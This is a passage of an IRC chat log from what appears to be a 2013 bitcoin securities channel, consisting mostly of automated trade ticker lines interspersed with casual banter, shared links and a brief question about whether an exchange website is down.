@ 0.0162 = 0.729 BTC [+] Jul 16 01:35:00 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 16 01:37:03 [BTCTC] [TAT.ASICMINER] 30 @ 0.041556 = 1.2467 BTC [-] Jul 16 01:41:56 [BTCTC] [TAT.VIRTUALMINE] 24 @ 0.00434 = 0.1042 BTC [+] Jul 16 01:43:46 [BTCTC] [DMS.MINING] 2 @ 0.0162 = 0.0324 BTC [+] Jul 16 01:44:01 [BTCTC] [COGNITIVE] 1 @ 0.60999 BTC [+] Jul 16 01:45:46 [BTCTC] [ASICMINER-PT] 1 @ 4.26 BTC [-] Jul 16 01:48:29 [BTCTC] [COGNITIVE] 1 @ 0.60999 BTC [+] Jul 16 01:49:30 [HAVELOCK] [SDSTM] 3 @ 0.00999 = 0.03 BTC [-] Jul 16 01:49:35 [BTCTC] [AMC-PT] 5000 @ 0.0025 = 12.5 BTC [+] Jul 16 01:49:40 [HAVELOCK] [SDSTM] 9 @ 0.0095 = 0.0855 BTC [-] Jul 16 01:50:00 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00434 = 0.013 BTC [+] Jul 16 01:51:15 [BTCTC] [ASICMINER-PT] 2 @ 4.25503 = 8.5101 BTC [-] Jul 16 01:56:34 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 16 02:02:20 [BTCTC] [COGNITIVE] 1 @ 0.61499 BTC [+] Jul 16 02:06:43 [15:39] so...satoshi square today <<< How was it? Jul 16 02:09:15 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 16 02:09:38 [BTCTC] [GSDPT] 38 @ 0.002295 = 0.0872 BTC [-] Jul 16 02:09:53 [BTCTC] [AMC-PT] 31 @ 0.0025 = 0.0775 BTC [+] Jul 16 02:10:27 [HAVELOCK] [AM100] 100 @ 0.040606 = 4.0606 BTC [-] Jul 16 02:12:52 [BTCTC] [TAT.ASICMINER] 50 @ 0.041557 = 2.0779 BTC [+] Jul 16 02:12:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.041556 BTC [-] Jul 16 02:12:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.041553 = 0.1247 BTC [-] Jul 16 02:12:58 [BTCTC] [TAT.ASICMINER] 4 @ 0.041381 = 0.1655 BTC [-] Jul 16 02:13:01 [BTCTC] [TAT.ASICMINER] 20 @ 0.04138 = 0.8276 BTC [-] Jul 16 02:13:11 [BTCTC] [TAT.ASICMINER] 22 @ 0.0413 = 0.9086 BTC [-] Jul 16 02:15:02 [BTCTC] [AMC-PT] 242 @ 0.0025 = 0.605 BTC [+] Jul 16 02:22:37 [MPEX] [S.MPOE] 11600 @ 0.00082043 = 9.517 BTC [+] Jul 16 02:23:49 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 16 02:25:06 [BTCTC] [BASIC-MINING] 3 @ 0.621001 = 1.863 BTC [-] Jul 16 02:25:08 [BTCTC] [BASIC-MINING] 1 @ 0.621 BTC [-] Jul 16 02:25:09 [BTCTC] [BASIC-MINING] 2 @ 0.595189 = 1.1904 BTC [-] Jul 16 02:30:20 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 16 02:31:04 [BTCTC] [AMC-PT] 12 @ 0.0025 = 0.03 BTC [+] Jul 16 02:31:18 [BTCTC] [S.DICE-PT] 50 @ 0.0022 = 0.11 BTC [+] Jul 16 02:34:52 [BTCTC] [DMS.MINING] 2 @ 0.0162 = 0.0324 BTC [+] Jul 16 02:37:44 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00434 BTC [+] Jul 16 02:46:21 [HAVELOCK] [SDSTM] 12 @ 0.0098 = 0.1176 BTC [+] Jul 16 02:46:22 [HAVELOCK] [SDSTM] 1070 @ 0.009999 = 10.6989 BTC [+] Jul 16 02:48:16 [MPEX] [S.MPOE] 4605 @ 0.00082043 = 3.7781 BTC [+] Jul 16 02:48:23 [MPEX] [S.MPOE] 11545 @ 0.00082103 = 9.4788 BTC [+] Jul 16 02:52:43 [HAVELOCK] [SDICE] 1 @ 0.20498999 BTC [+] Jul 16 02:52:43 [HAVELOCK] [SDICE] 8 @ 0.20499 = 1.6399 BTC [+] Jul 16 02:52:44 [HAVELOCK] [SDICE] 5 @ 0.207 = 1.035 BTC [+] Jul 16 02:59:03 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 16 02:59:54 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 16 03:00:19 [BTCTC] [AMC-PT] 15 @ 0.0025 = 0.0375 BTC [+] Jul 16 03:01:08 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 16 03:01:51 [BTCTC] [ASICMINER-PT] 2 @ 4.3 = 8.6 BTC [+] Jul 16 03:03:05 http://imgur.com/ygBqgtT Jul 16 03:03:07 imgur: the simple image sharer Jul 16 03:04:23 [BTCTC] [AMC-PT] 550 @ 0.0025 = 1.375 BTC [+] Jul 16 03:05:53 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 16 03:10:15 jcpham: lolwut? Jul 16 03:14:16 [BTCTC] [S.MPOE-PT] 2 @ 0.000821 = 0.0016 BTC [-] Jul 16 03:14:19 [BTCTC] [S.MPOE-PT] 98 @ 0.00082 = 0.0804 BTC [-] Jul 16 03:27:35 http://buttcoin.org/max-keiser-loses-his-damn-mind Jul 16 03:27:36 Max Keiser loses his damn mind - Buttcoin - The P2P crypto-currency for butts. Jul 16 03:27:53 [BTCTC] [BFMINES] 6 @ 0.003989 = 0.0239 BTC [-] Jul 16 03:28:46 [BTCTC] [BFMINES] 194 @ 0.00399 = 0.7741 BTC [+] Jul 16 03:29:19 [BTCTC] [LTC-ATF.B2] 31 @ 0.010419 = 0.323 BTC [+] Jul 16 03:29:30 [BTCTC] [LTC-ATF.B2] 5 @ 0.01042 = 0.0521 BTC [+] Jul 16 03:32:21 [BTCTC] [BITVPS] 152 @ 0.001655 = 0.2516 BTC [+] Jul 16 03:32:23 [BTCTC] [BITVPS] 3 @ 0.001654 = 0.005 BTC [-] Jul 16 03:32:29 [BTCTC] [BITVPS] 50 @ 0.00164 = 0.082 BTC [-] Jul 16 03:32:32 [BTCTC] [BITVPS] 100 @ 0.001621 = 0.1621 BTC [-] Jul 16 03:32:37 [BTCTC] [BITVPS] 340 @ 0.001621 = 0.5511 BTC [-] Jul 16 03:32:39 [BTCTC] [BITVPS] 1000 @ 0.001621 = 1.621 BTC [-] Jul 16 03:44:24 lol what now Jul 16 03:45:09 hahaha Jul 16 03:45:10 cool one. Jul 16 03:48:22 [BTCTC] [ASICMINER-PT] 1 @ 4.32849 BTC [+] Jul 16 03:49:33 [BTCTC] [COGNITIVE] 1 @ 0.61498 BTC [-] Jul 16 03:50:01 [BTCTC] [COGNITIVE] 18 @ 0.61499 = 11.0698 BTC [+] Jul 16 03:51:26 [BTCTC] [COGNITIVE] 15 @ 0.615 = 9.225 BTC [+] Jul 16 03:52:09 [BTCTC] [DMS.MINING] 20 @ 0.015525 = 0.3105 BTC [-] Jul 16 03:54:28 [BTCTC] [COGNITIVE] 1 @ 0.615 BTC [+] Jul 16 03:55:54 [MPEX] [S.MPOE] 11000 @ 0.00081789 = 8.9968 BTC [-] Jul 16 03:58:20 keiser quite obviously didnt have a mind to lose Jul 16 03:58:51 [BTCTC] [COGNITIVE] 1 @ 0.615 BTC [+] Jul 16 04:07:37 [HAVELOCK] [KCIM] 1 @ 0.9 BTC [+] Jul 16 04:07:45 [BTCTC] [AMC-PT] 2 @ 0.002493 = 0.005 BTC [-] Jul 16 04:07:47 [BTCTC] [AMC-PT] 100 @ 0.002492 = 0.2492 BTC [-] Jul 16 04:07:48 [BTCTC] [AMC-PT] 138 @ 0.002491 = 0.3438 BTC [-] Jul 16 04:09:54 [BTCTC] [ASICMINER-PT] 1 @ 4.270003 BTC [-] Jul 16 04:09:56 [BTCTC] [ASICMINER-PT] 1 @ 4.270002 BTC [-] Jul 16 04:09:58 [BTCTC] [ASICMINER-PT] 1 @ 4.270001 BTC [-] Jul 16 04:10:00 [BTCTC] [ASICMINER-PT] 2 @ 4.246109 = 8.4922 BTC [-] Jul 16 04:11:51 [BTCTC] [ASICMINER-PT] 1 @ 4.24611 BTC [+] Jul 16 04:12:01 [BTCTC] [COG.F] 1 @ 8.869 BTC [+] Jul 16 04:12:02 [BTCTC] [COGNITIVE] 4 @ 0.61 = 2.44 BTC [-] Jul 16 04:12:04 [BTCTC] [COGNITIVE] 30 @ 0.615 = 18.45 BTC [+] Jul 16 04:12:51 [BTCTC] [COGNITIVE] 3 @ 0.615 = 1.845 BTC [+] Jul 16 04:18:01 [BTCTC] [TAT.ASICMINER] 4 @ 0.04135 = 0.1654 BTC [+] Jul 16 04:18:03 [BTCTC] [TAT.ASICMINER] 24 @ 0.04135 = 0.9924 BTC [+] Jul 16 04:23:18 [BTCTC] [AMC-PT] 10 @ 0.002491 = 0.0249 BTC [-] Jul 16 04:25:56 [BTCTC] [BASIC-MINING] 1 @ 0.674995 BTC [+] Jul 16 04:27:02 [BTCTC] [TAT.ASICMINER] 6 @ 0.042043 = 0.2523 BTC [+] Jul 16 04:27:44 [BTCTC] [AMC-PT] 6 @ 0.0025 = 0.015 BTC [+] Jul 16 04:29:40 [MPEX] [S.MPOE] 5550 @ 0.00081789 = 4.5393 BTC [-] Jul 16 04:30:55 [MPEX] [S.MPOE] 11550 @ 0.00081823 = 9.4506 BTC [+] Jul 16 04:33:59 [BTCTC] [S.DICE-PT] 300 @ 0.0023 = 0.69 BTC [+] Jul 16 04:36:25 [HAVELOCK] [SDSTM] 10 @ 0.01 = 0.1 BTC [+] Jul 16 04:36:26 [HAVELOCK] [SDSTM] 200 @ 0.01035 = 2.07 BTC [+] Jul 16 04:36:28 [HAVELOCK] [SDSTM] 10 @ 0.0109 = 0.109 BTC [+] Jul 16 04:36:29 [HAVELOCK] [SDSTM] 780 @ 0.011 = 8.58 BTC [+] Jul 16 04:37:57 dub you may well have a point there. Jul 16 04:38:06 he does have a stripped shirt tho, just as good neh ? Jul 16 04:39:40 [BTCTC] [DMS.PURCHASE] 20 @ 0.040033 = 0.8007 BTC [+] Jul 16 04:43:39 [BTCTC] [COGNITIVE] 1 @ 0.6 BTC [-] Jul 16 04:44:04 [BTCTC] [COGNITIVE] 10 @ 0.575 = 5.75 BTC [-] Jul 16 04:44:34 [MPEX] [S.MPOE] 782 @ 0.00081789 = 0.6396 BTC [-] Jul 16 04:44:35 [MPEX] [S.MPOE] 5167 @ 0.00081782 = 4.2257 BTC [-] Jul 16 04:47:23 [BTCTC] [DMS.PURCHASE] 1 @ 0.040033 BTC [+] Jul 16 04:52:04 [BTCTC] [DMS.MINING] 12 @ 0.01553 = 0.1864 BTC [+] Jul 16 04:53:19 [BTCTC] [DMS.MINING] 188 @ 0.01553 = 2.9196 BTC [+] Jul 16 04:53:21 [BTCTC] [DMS.MINING] 5 @ 0.015525 = 0.0776 BTC [-] Jul 16 04:53:35 [BTCTC] [TAT.VIRTUALMINE] 43 @ 0.00428 = 0.184 BTC [-] Jul 16 04:57:41 [MPEX] [S.MPOE] 5433 @ 0.00081782 = 4.4432 BTC [-] Jul 16 04:57:43 [MPEX] [S.MPOE] 1367 @ 0.00081756 = 1.1176 BTC [-] Jul 16 04:57:59 [MPEX] [S.DICE] 7765 @ 0.002385 = 18.5195 BTC [+] Jul 16 04:58:02 [MPEX] [S.DICE] 3410 @ 0.0023999 = 8.1837 BTC [+] Jul 16 04:58:04 [MPEX] [S.DICE] 1000 @ 0.00239998 = 2.4 BTC [+] Jul 16 04:58:09 [MPEX] [S.DICE] 1000 @ 0.00239999 = 2.4 BTC [+] Jul 16 04:58:12 [MPEX] [S.DICE] 2000 @ 0.00239999 = 4.8 BTC [+] Jul 16 04:58:13 [MPEX] [S.DICE] 167900 @ 0.002499 = 419.5821 BTC [+] Jul 16 05:04:44 [BTCTC] [DMS.SELLING] 2 @ 0.02489 = 0.0498 BTC [+] Jul 16 05:06:30 whoa, that was a big S.dice buy Jul 16 05:07:33 [BTCTC] [TAT.ASICMINER] 2 @ 0.042033 = 0.0841 BTC [-] Jul 16 05:08:39 cocain is a hellova drug Jul 16 05:16:17 dub: they are using the profit from selling cocain to buy S.Dice? Jul 16 05:16:55 [HAVELOCK] [AM100] 1 @ 0.04058 BTC [-] Jul 16 05:17:12 [HAVELOCK] [AM100] 250 @ 0.04059899 = 10.1497 BTC [+] Jul 16 05:17:18 [HAVELOCK] [AM100] 45 @ 0.04061 = 1.8275 BTC [+] Jul 16 05:17:23 [HAVELOCK] [AM100] 15 @ 0.04062 = 0.6093 BTC [+] Jul 16 05:17:31 [HAVELOCK] [AM100] 25 @ 0.040786 = 1.0197 BTC [+] Jul 16 05:17:40 [HAVELOCK] [AM100] 5 @ 0.04079 = 0.204 BTC [+] Jul 16 05:17:46 [HAVELOCK] [AM100] 100 @ 0.0407999 = 4.08 BTC [+] Jul 16 05:17:48 http://www.funnyordie.com/videos/7adaff011a/chappelle-show-charlie-murphy-and-rick-james Jul 16 05:17:49 Chappelle Show: Charlie Murphy and Rick James from candeemeg99 Jul 16 05:17:52 [HAVELOCK] [AM100] 50 @ 0.04079999 = 2.04 BTC [+] Jul 16 05:17:58 [HAVELOCK] [AM100] 100 @ 0.04083999 = 4.084 BTC [+] Jul 16 05:18:10 [HAVELOCK] [AM100] 83 @ 0.04083999 = 3.3897 BTC [+] Jul 16 05:18:23 [HAVELOCK] [AM100] 10 @ 0.040849 = 0.4085 BTC [+] Jul 16 05:18:25 [HAVELOCK] [AM100] 10 @ 0.040872 = 0.4087 BTC [+] Jul 16 05:18:26 [HAVELOCK] [AM100] 10 @ 0.040874 = 0.4087 BTC [+] Jul 16 05:18:27 [HAVELOCK] [AM100] 10 @ 0.040876 = 0.4088 BTC [+] Jul 16 05:18:28 [HAVELOCK] [AM100] 10 @ 0.040878 = 0.4088 BTC [+] Jul 16 05:18:33 [HAVELOCK] [AM100] 5 @ 0.04088888 = 0.2044 BTC [+] Jul 16 05:18:45 [HAVELOCK] [AM100] 3 @ 0.040896 = 0.1227 BTC [+] Jul 16 05:18:48 [HAVELOCK] [AM100] 5 @ 0.040897 = 0.2045 BTC [+] Jul 16 05:18:55 [HAVELOCK] [AM100] 24 @ 0.0408999 = 0.9816 BTC [+] Jul 16 05:19:03 [HAVELOCK] [AM100] 8 @ 0.041 = 0.328 BTC [+] Jul 16 05:19:04 [HAVELOCK] [AM100] 100 @ 0.041 = 4.1 BTC [+] Jul 16 05:19:13 [HAVELOCK] [AM100] 10 @ 0.04109688 = 0.411 BTC [+] Jul 16 05:20:09 [MPEX] [S.MPOE] 3450 @ 0.00081823 = 2.8229 BTC [+] Jul 16 05:25:39 http://www.google.com/search?q=Tilt&complete=0 Jul 16 05:25:42 check that shit out Jul 16 05:25:46 google easter egg Jul 16 05:28:37 It's... annoying Jul 16 05:31:18 the ignorance of chappelle-memes in this channel is frankly dissapointing Jul 16 05:31:28 you people need to work harder at tinternet Jul 16 05:32:15 we're white. Jul 16 05:32:59 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 16 05:39:54 [MPEX] [S.MPOE] 2400 @ 0.00082103 = 1.9705 BTC [+] Jul 16 05:41:31 http://www.reddit.com/r/Bitcoin/comments/1id5fx/unlimited_mtgox_haiku_thread/ Jul 16 05:41:33 Unlimited MtGox Haiku Thread : Bitcoin Jul 16 05:45:35 [BTCTC] [GSDPT] 10 @ 0.002015 = 0.0202 BTC [-] Jul 16 05:47:46 [MPEX] [S.MPOE] 6100 @ 0.00081933 = 4.9979 BTC [-] Jul 16 05:47:58 [HAVELOCK] [AM100] 3 @ 0.04031 = 0.1209 BTC [-] Jul 16 05:48:07 [HAVELOCK] [AM100] 2 @ 0.04030001 = 0.0806 BTC [-] Jul 16 05:48:19 [HAVELOCK] [AM100] 1 @ 0.04032 BTC [+] Jul 16 05:48:21 [HAVELOCK] [AM100] 97 @ 0.0403 = 3.9091 BTC [-] Jul 16 05:50:32 [BTCTC] [TAT.VIRTUALMINE] 54 @ 0.00434 = 0.2344 BTC [+] Jul 16 05:57:48 [BTCTC] [BTC-BOND] 1 @ 0.00996 BTC [-] Jul 16 06:01:02 [BTCTC] [ASICMINER-PT] 1 @ 4.3245 BTC [+] Jul 16 06:04:44 [BTCTC] [ASICMINER-PT] 1 @ 4.3279 BTC [+] Jul 16 06:04:45 [BTCTC] [ASICMINER-PT] 1 @ 4.3285 BTC [+] Jul 16 06:04:47 [BTCTC] [ASICMINER-PT] 1 @ 4.3299 BTC [+] Jul 16 06:04:48 [BTCTC] [ASICMINER-PT] 2 @ 4.329999 = 8.66 BTC [+] Jul 16 06:04:56 [BTCTC] [ASICMINER-PT] 11 @ 4.33 = 47.63 BTC [+] Jul 16 06:05:26 [HAVELOCK] [AM100] 10 @ 0.0406055 = 0.4061 BTC [+] Jul 16 06:06:28 [BTCTC] [ASICMINER-PT] 9 @ 4.33 = 38.97 BTC [+] Jul 16 06:14:02 [MPEX] [S.MPOE] 8455 @ 0.00082103 = 6.9418 BTC [+] Jul 16 06:14:04 [MPEX] [S.MPOE] 10671 @ 0.00082114 = 8.7624 BTC [+] Jul 16 06:22:59 [HAVELOCK] [AM1] 1 @ 4.3 BTC [-] Jul 16 06:23:47 [BTCTC] [TAT.ASICMINER] 14 @ 0.041357 = 0.579 BTC [-] Jul 16 06:32:24 [BTCTC] [BASIC-MINING] 2 @ 0.590001 = 1.18 BTC [-] Jul 16 06:34:28 dub vs. IT round 2 Jul 16 06:35:04 can you enable hibernating or allow me to do it so my laptop doesnt try to catch fire all the time Jul 16 06:35:09 no Jul 16 06:35:38 no is always the best answer Jul 16 06:35:40 [BTCTC] [BASIC-MINING] 5 @ 0.560107 = 2.8005 BTC [-] Jul 16 06:35:58 [BTCTC] [BASIC-MINING] 1 @ 0.560106 BTC [-] Jul 16 06:36:00 [BTCTC] [BASIC-MINING] 4 @ 0.560104 = 2.2404 BTC [-] Jul 16 06:36:52 [BTCTC] [COGNITIVE] 4 @ 0.6149 = 2.4596 BTC [+] Jul 16 06:38:36 no Jul 16 06:39:06 [BTCTC] [BASIC-MINING] 3 @ 0.560105 = 1.6803 BTC [+] Jul 16 06:39:08 [BTCTC] [BASIC-MINING] 2 @ 0.560104 = 1.1202 BTC [-] Jul 16 06:39:10 [BTCTC] [BASIC-MINING] 1 @ 0.5601 BTC [-] Jul 16 06:39:11 [BTCTC] [BASIC-MINING] 2 @ 0.560001 = 1.12 BTC [-] Jul 16 06:39:57 [BTCTC] [ASICMINER-PT] 2 @ 4.37 = 8.74 BTC [+] Jul 16 06:40:13 [BTCTC] [COGNITIVE] 6 @ 0.6149 = 3.6894 BTC [+] Jul 16 06:40:15 [BTCTC] [COGNITIVE] 10 @ 0.615 = 6.15 BTC [+] Jul 16 06:42:22 [BTCTC] [BASIC-MINING] 8 @ 0.560001 = 4.48 BTC [-] Jul 16 06:42:24 [BTCTC] [BASIC-MINING] 1 @ 0.56 BTC [-] Jul 16 06:42:26 [BTCTC] [BASIC-MINING] 7 @ 0.550003 = 3.85 BTC [-] Jul 16 06:43:50 [BTCTC] [COGNITIVE] 16 @ 0.615 = 9.84 BTC [+] Jul 16 06:45:57 [BTCTC] [ASICMINER-PT] 4 @ 4.379499 = 17.518 BTC [+] Jul 16 06:49:22 [BTCTC] [ASICMINER-PT] 1 @ 4.3768 BTC [-] Jul 16 06:49:41 [BTCTC] [COGNITIVE] 7 @ 0.615 = 4.305 BTC [+] Jul 16 06:49:59 [BTCTC] [ASICMINER-PT] 1 @ 4.3768 BTC [-] Jul 16 06:50:01 [BTCTC] [ASICMINER-PT] 1 @ 4.379499 BTC [+] Jul 16 06:50:03 [BTCTC] [ASICMINER-PT] 1 @ 4.3795 BTC [+] Jul 16 06:50:27 [BTCTC] [ASICMINER-PT] 5 @ 4.38 = 21.9 BTC [+] Jul 16 06:50:53 [BTCTC] [COGNITIVE] 7 @ 0.615 = 4.305 BTC [+] Jul 16 06:53:36 [MPEX] [S.MPOE] 2200 @ 0.00082114 = 1.8065 BTC [+] Jul 16 06:54:24 [BTCTC] [TAT.ASICMINER] 32 @ 0.041356 = 1.3234 BTC [-] Jul 16 06:56:31 [BTCTC] [COGNITIVE] 2 @ 0.615 = 1.23 BTC [+] Jul 16 06:58:22 Hi guys is mpex down? Jul 16 06:58:33 no Jul 16 06:58:54 Mpex.co not Jul 16 06:59:07 Mpex.co not opening Jul 16 06:59:29 ;;isitdown mpex.co Jul 16 06:59:30 mpex.co is up Jul 16 07:00:09 Safari says too many redirects occurred Jul 16 07:00:22 you can use assbot to post orders Jul 16 07:00:45 And quotes Jul 16 07:01:15 could be teh great firewall of canada Jul 16 07:01:22 or using a mac Jul 16 07:01:35 [BTCTC] [BASIC-MINING] 3 @ 0.550004 = 1.65 BTC [+] Jul 16 07:01:37 [BTCTC] [BASIC-MINING] 3 @ 0.550003 = 1.65 BTC [-] Jul 16 07:01:38 [BTCTC] [BASIC-MINING] 3 @ 0.550001 = 1.65 BTC [-] Jul 16 07:03:16 http://community.namecheap.com/blog/2013/07/15/bitcoin-zero-confirmation/ Jul 16 07:03:19 Zero-Confirmation Transactions Now with Bitcoin » Namecheap Blog Jul 16 07:04:40 Ok I got it opening I think it's the browser Jul 16 07:05:50 [BTCTC] [TAT.ASICMINER] 14 @ 0.041357 = 0.579 BTC [+] Jul 16 07:05:56 [BTCTC] [COGNITIVE] 3 @ 0.615 = 1.845 BTC [+] Jul 16 07:06:44 [BTCTC] [COGNITIVE] 5 @ 0.615 = 3.075 BTC [+] Jul 16 07:07:51 [BTCTC] [BASIC-MINING] 8 @ 0.550001 = 4.4 BTC [-] Jul 16 07:07:53 [BTCTC] [BASIC-MINING] 10 @ 0.55 = 5.5 BTC [-] Jul 16 07:07:54 [BTCTC] [BASIC-MINING] 1 @ 0.55 BTC [-] Jul 16 07:07:56 [BTCTC] [BASIC-MINING] 3 @ 0.535518 = 1.6066 BTC [-] Jul 16 07:07:57 [BTCTC] [BASIC-MINING] 3 @ 0.535 = 1.605 BTC [-] Jul 16 07:09:13 [BTCTC] [COGNITIVE] 22 @ 0.615 = 13.53 BTC [+] Jul 16 07:09:32 [BTCTC] [COGNITIVE] 2 @ 0.615 = 1.23 BTC [+] Jul 16 07:11:19 [HAVELOCK] [AM100] 10 @ 0.04115 = 0.4115 BTC [+] Jul 16 07:17:06 [BTCTC] [ASICMINER-PT] 1 @ 4.275005 BTC [-] Jul 16 07:18:16 [BTCTC] [COGNITIVE] 6 @ 0.615 = 3.69 BTC [+] Jul 16 07:18:34 [BTCTC] [DMS.MINING] 5 @ 0.0162 = 0.081 BTC [+] Jul 16 07:18:36 [BTCTC] [BASIC-MINING] 3 @ 0.535001 = 1.605 BTC [+] Jul 16 07:18:37 [BTCTC] [BASIC-MINING] 3 @ 0.535 = 1.605 BTC [-] Jul 16 07:18:39 [BTCTC] [BASIC-MINING] 2 @ 0.53 = 1.06 BTC [-] Jul 16 07:18:40 [BTCTC] [BASIC-MINING] 3 @ 0.53 = 1.59 BTC [-] Jul 16 07:18:42 [BTCTC] [BASIC-MINING] 4 @ 0.53 = 2.12 BTC [-] Jul 16 07:18:44 [BTCTC] [BASIC-MINING] 2 @ 0.525 = 1.05 BTC [-] Jul 16 07:18:45 [BTCTC] [BASIC-MINING] 10 @ 0.511 = 5.11 BTC [-] Jul 16 07:18:47 [BTCTC] [BASIC-MINING] 7 @ 0.510005 = 3.57 BTC [-] Jul 16 07:18:59 [BTCTC] [BASIC-MINING] 16 @ 0.51 = 8.16 BTC [-] Jul 16 07:20:37 [BTCTC] [LTC-ATF.B2] 1 @ 0.010424 BTC [+] Jul 16 07:21:06 [BTCTC] [LTC-ATF.B2] 6 @ 0.010424 = 0.0625 BTC [+] Jul 16 07:21:39 [BTCTC] [COGNITIVE] 42 @ 0.615 = 25.83 BTC [+] Jul 16 07:24:05 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 16 07:26:25 [BTCTC] [BASIC-MINING] 2 @ 0.599999 = 1.2 BTC [+] Jul 16 07:27:19 [BTCTC] [TAT.ASICMINER] 12 @ 0.041974 = 0.5037 BTC [+] Jul 16 07:31:47 [BTCTC] [COGNITIVE] 2 @ 0.615 = 1.23 BTC [+] Jul 16 07:31:48 [BTCTC] [TAT.ASICMINER] 4 @ 0.04197 = 0.1679 BTC [-] Jul 16 07:31:51 [BTCTC] [TAT.ASICMINER] 6 @ 0.041971 = 0.2518 BTC [+] Jul 16 07:33:08 [BTCTC] [AMC-PT] 65 @ 0.0025 = 0.1625 BTC [+] Jul 16 07:34:10 [MPEX] [S.MPOE] 708 @ 0.00081933 = 0.5801 BTC [-] Jul 16 07:34:12 [MPEX] [S.MPOE] 4492 @ 0.00081851 = 3.6767 BTC [-] Jul 16 07:44:13 canada has firewalls now ?! Jul 16 07:46:12 [HAVELOCK] [AM100] 4 @ 0.0413489 = 0.1654 BTC [+] Jul 16 07:47:27 [BTCTC] [B.YABMC] 3 @ 0.0035 = 0.0105 BTC [+] Jul 16 07:49:26 [BTCTC] [COGNITIVE] 1 @ 0.615 BTC [+] Jul 16 07:49:38 [BTCTC] [COGNITIVE] 5 @ 0.615 = 3.075 BTC [+] Jul 16 07:51:04 [BTCTC] [BASIC-MINING] 8 @ 0.52 = 4.16 BTC [-] Jul 16 07:51:06 [BTCTC] [BASIC-MINING] 3 @ 0.510003 = 1.53 BTC [-] Jul 16 07:51:08 [BTCTC] [BASIC-MINING] 9 @ 0.510002 = 4.59 BTC [-] Jul 16 07:52:08 [BTCTC] [COGNITIVE] 17 @ 0.615 = 10.455 BTC [+] Jul 16 07:55:08 [MPEX] [S.MPOE] 4871 @ 0.00082114 = 3.9998 BTC [+] Jul 16 07:55:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.041473 BTC [-] Jul 16 07:56:13 [BTCTC] [TAT.ASICMINER] 14 @ 0.041356 = 0.579 BTC [-] Jul 16 07:56:39 [BTCTC] [ASICMINER-PT] 3 @ 4.277045 = 12.8311 BTC [+] Jul 16 07:56:40 [BTCTC] [COGNITIVE] 1 @ 0.615 BTC [+] Jul 16 07:56:48 [BTCTC] [DMS.SELLING] 2 @ 0.024031 = 0.0481 BTC [-] Jul 16 07:56:50 [BTCTC] [DMS.SELLING] 66 @ 0.02403 = 1.586 BTC [-] Jul 16 07:56:50 [BTCTC] [DMS.SELLING] 32 @ 0.02402 = 0.7686 BTC [-] Jul 16 07:57:27 [BTCTC] [COGNITIVE] 4 @ 0.615 = 2.46 BTC [+] Jul 16 07:58:09 [BTCTC] [BASIC-MINING] 2 @ 0.5101 = 1.0202 BTC [+] Jul 16 07:58:46 [BTCTC] [BASIC-MINING] 4 @ 0.51 = 2.04 BTC [-] Jul 16 07:58:48 [BTCTC] [BASIC-MINING] 3 @ 0.51 = 1.53 BTC [-] Jul 16 07:58:50 [BTCTC] [BASIC-MINING] 2 @ 0.51 = 1.02 BTC [-] Jul 16 07:59:50 [BTCTC] [BASIC-MINING] 1 @ 0.5 BTC [-] Jul 16 07:59:52 [BTCTC] [BASIC-MINING] 3 @ 0.5 = 1.5 BTC [-] Jul 16 08:00:34 [BTCTC] [BASIC-MINING] 5 @ 0.49 = 2.45 BTC [-] Jul 16 08:01:03 [BTCTC] [AMC-PT] 5004 @ 0.0025 = 12.51 BTC [+] Jul 16 08:02:15 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 16 08:02:48 [MPEX] [S.MPOE] 1490 @ 0.00082114 = 1.2235 BTC [+] Jul 16 08:03:33 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 16 08:07:12 [MPEX] [S.MPOE] 418 @ 0.00082114 = 0.3432 BTC [+] Jul 16 08:07:13 [MPEX] [S.MPOE] 3875 @ 0.00082252 = 3.1873 BTC [+] Jul 16 08:11:00 [BTCTC] [COGNITIVE] 1 @ 0.561793 BTC [-] Jul 16 08:12:47 [BTCTC] [AMC-PT] 14 @ 0.0025 = 0.035 BTC [+] Jul 16 08:13:24 [BTCTC] [ASICMINER-PT] 3 @ 4.270015 = 12.81 BTC [-] Jul 16 08:13:26 [BTCTC] [ASICMINER-PT] 2 @ 4.270009 = 8.54 BTC [-] Jul 16 08:14:20 [BTCTC] [COGNITIVE] 35 @ 0.615 = 21.525 BTC [+] Jul 16 08:17:15 [BTCTC] [DMS.SELLING] 8 @ 0.02402 = 0.1922 BTC [-] Jul 16 08:17:17 [BTCTC] [DMS.SELLING] 17 @ 0.02401 = 0.4082 BTC [-] Jul 16 08:17:19 [BTCTC] [DMS.SELLING] 10 @ 0.02401 = 0.2401 BTC [-] Jul 16 08:17:21 [BTCTC] [DMS.SELLING] 97 @ 0.024001 = 2.3281 BTC [-] Jul 16 08:17:40 [BTCTC] [COGNITIVE] 5 @ 0.6 = 3 BTC [-] Jul 16 08:18:20 [HAVELOCK] [SDICE] 1 @ 0.20699999 BTC [-] Jul 16 08:19:00 [HAVELOCK] [AM100] 1 @ 0.0413489 BTC [+] Jul 16 08:19:48 [MPEX] [S.MPOE] 4950 @ 0.00082526 = 4.085 BTC [+] Jul 16 08:19:48 [MPEX] [S.MPOE] 7500 @ 0.00082629 = 6.1972 BTC [+] Jul 16 08:20:00 [MPEX] [S.MPOE] 4400 @ 0.00082654 = 3.6368 BTC [+] Jul 16 08:20:38 [BTCTC] [ASICMINER-PT] 1 @ 4.279 BTC [+] Jul 16 08:20:40 [BTCTC] [ASICMINER-PT] 1 @ 4.275001 BTC [-] Jul 16 08:22:09 [BTCTC] 